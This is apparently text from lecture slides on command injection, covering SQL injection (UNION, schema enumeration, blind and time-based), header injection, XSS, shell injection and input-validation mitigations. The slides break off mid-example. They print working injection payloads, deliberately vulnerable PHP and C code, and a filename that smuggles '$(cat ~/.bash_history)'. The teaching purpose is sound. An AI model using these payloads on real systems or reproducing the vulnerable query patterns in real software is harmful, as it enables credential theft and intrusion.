SQL Injection
Command Injection Attacks
‹#›
Command Injection Attacks
A class of attacks in which
… data provided by the user
… is passed to an application
… which interprets it as commands
‹#›
‹#›
$query = “SELECT * FROM users WHERE user_id=” OR 1=1;–‘
AND password=’secret'”
$query = “SELECT * FROM users WHERE user_id=’yval’
AND password=’secret'”
‘ OR 1=1;–
SQL Injection
User
Password
$query = “SELECT * FROM users WHERE user_id=’$_POST[user]’
AND password=’$_POST[password]'”
yval
secret
‹#›
A More Realistic Example
$query = “SELECT * FROM users WHERE user_id=’$_POST[user]'”;
$stmt = $db->query($query);
$row = $stmt->fetch(PDO::FETCH_ASSOC);
if (!password_match($_POST[‘password’], $row[‘password’]) {
. . .
}
‘ UNION SELECT ‘admin’,’$2a$05$b
User
Password
$query = “SELECT * FROM users WHERE user_id=” UNION
SELECT ‘admin’, ‘$2a$05$b…’; –“;
‹#›
Querying the DB
http://www.mysite.com/article.php?id=1234
$query = “select * from articles where id=’$_GET[id]'”;
$stmt = $db->query($query);
$row = $stmt->fetch(PDO::FETCH_ASSOC);
.
.
.
echo $row[‘title’];
http://www.mysite.com/article.php?id=xxx’ UNION
SELECT 1,2,password,3 FROM users WHERE user=’admin’;–
‹#›
Querying DB Schema
How does the attacker know the database structure?
Query metadata in information_schema
http://www.mysite.com/article.php?id=xxx’ UNION
SELECT 1,2,group_concat(schema_name),3
FROM information_schema.schemata;–
http://www.mysite.com/article.php?id=xxx’ UNION
SELECT 1,2,group_concat(table_name),3
FROM information_schema.tables
WHERE table_schema=’articles’;–
‹#›
Blind SQL Injection (content-based)
$query = “SELECT * FROM users WHERE name=’$_POST[user]'”;
$stmt = $db->query($query);
if ($stmt->rowCount() != 1) {
echo “User does not exist”
} else {
$row = $stmt->fetch(PDO::FETCH_ASSOC);
sendNewPassword($row[’email’]);
echo “Email sent”
}
Xxxxx’ UNION SELECT 1,2,3,4 FROM
information_schema.tables WHERE
table_schema=’users’ having
substring(group_concat(table_name),1,1)=’a’; —
‹#›
Blind SQL Injection (time-based)
What to do when there is no user-visible output?
Xxxxx’ UNION SELECT
IF(SUBSTRING(user_password,1,1) = ‘a’,
BENCHMARK(5000000,ENCODE(‘MSG’,’Salt’)),
null) FROM users
WHERE user_id = 1;–
‹#›
Exploits of a Mom
Her daughter is named Help I’m trapped in a driver’s license factory.
‹#›
Injection Mechanisms
User Input
Server Variables
Cookies
function ip_adr() {
if (isset($_SERVER[‘HTTP_X_FORWARDED_FOR’]) {
$ip_adr = $_SERVER[‘HTTP_X_FORWARDED_FOR’];
} else {
$ip_adr = $_SERVER[“REMOTE_ADDR”];
}
}
$query = “SELECT FROM badHosts WHERE ip='”.ip_adr().”‘”
‹#›
Setting Cookies
Implement an HTTP client
E.g. using Python
Use wget
See man page
Edit browser’s cookie storage
Install a browser plug-ins
Run a Burp proxy
‹#›
Another example
http://mysite.com/hello.php?name=
%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E
Hello
‹#›
eBay, 2014
Source: http://www.makeuseof.com/tag/ebay-security-breach-reconsider-membership/
‹#›
eBay, 2017
Source: https://news.netcraft.com/archives/2017/02/17/
hackers-still-exploiting-ebays-stored-xss-vulnerabilities-in-2017.html
‹#›
Shell Injection
int main(int argc, char** argv) {
char cmd[CMD_MAX] = “/bin/cat “;
strcat(cmd, argv[1]);
system(cmd);
}
./program “/dev/null; ls”
Adapted from: https://www.owasp.org/index.php/Command_Injection
‹#›
Attacking the Washington, D.C. Internet Voting System
Wolchok et al. FC 2012
run(“gpg”, “−−trust−model always −o
\”#{File.expand_path(dst.path)}\” −e −r
\”#{@recipient}\”
\”#{File.expand_path(src.path)}\””)
Upload file: foo.$(cat ~/.bash_history)
‹#›
17
Source: Wolchok et al. FC 2012
‹#›
Mitigation
Whitelist –
Look for patterns that demonstrate that the data is valid. Reject everything else
Do you know the format of the input?
What characters can go into a name?
Blacklist
Look for patterns that demonstrate that the data is invalid. Everything else is valid.
Are you aware of all possible attacks?
Escape
Transform data to ensure safety
Easier said than done
‹#›
Whitelisting example
public boolean isValidZip(String in) {
if (in == null )
return false;
if (Pattern.matches(“^\d{5}(-\d{4})?$”, in))
return true;
return false;
}
‹#›
ZIP – Zone Improvement Program
Canada ZIP codes
20
Whitelisting example
if (isValidZip(request.getParameter(“zip”)) == false) {
return response.BAD_ZIP
}
// parameter contains ZIP code, continue
show_zip = ““+request.getparameter(“zip”)+”“;
‹#›
ZIP – Zone Improvement Program
Canada ZIP codes
21
Mitigation
Whitelist –
Look for patterns that demonstrate that the data is valid. Reject everything else
Do you know the format of the input?
What characters can go into a name?
Blacklist
Look for patterns that demonstrate that the data is invalid. Everything else is valid.
Are you aware of all possible attacks?
Escape
Transform data to ensure safety
Easier said than done
‹#›
Source: https://www.drupal.org/node/129165
‹#›
Source: http://www.wired.com/2015/11/null/
‹#›
Class Exercise
What is the format of an email address?
‹#›
Email address – Local part
Source: Wikipedia
‹#›
Mitigation
Whitelist –
Look for patterns that demonstrate that the data is valid. Reject everything else
Do you know the format of the input?
What characters can go into a name?
Blacklist
Look for patterns that demonstrate that the data is invalid. Everything else is valid.
Are you aware of all possible attacks?
Escape
Transform data to ensure safety
Easier said than done
‹#›
Blacklisting example
public boolean dontXSSmeBro(String in) {
if (in == null )
return false;
if (Pattern.matches(“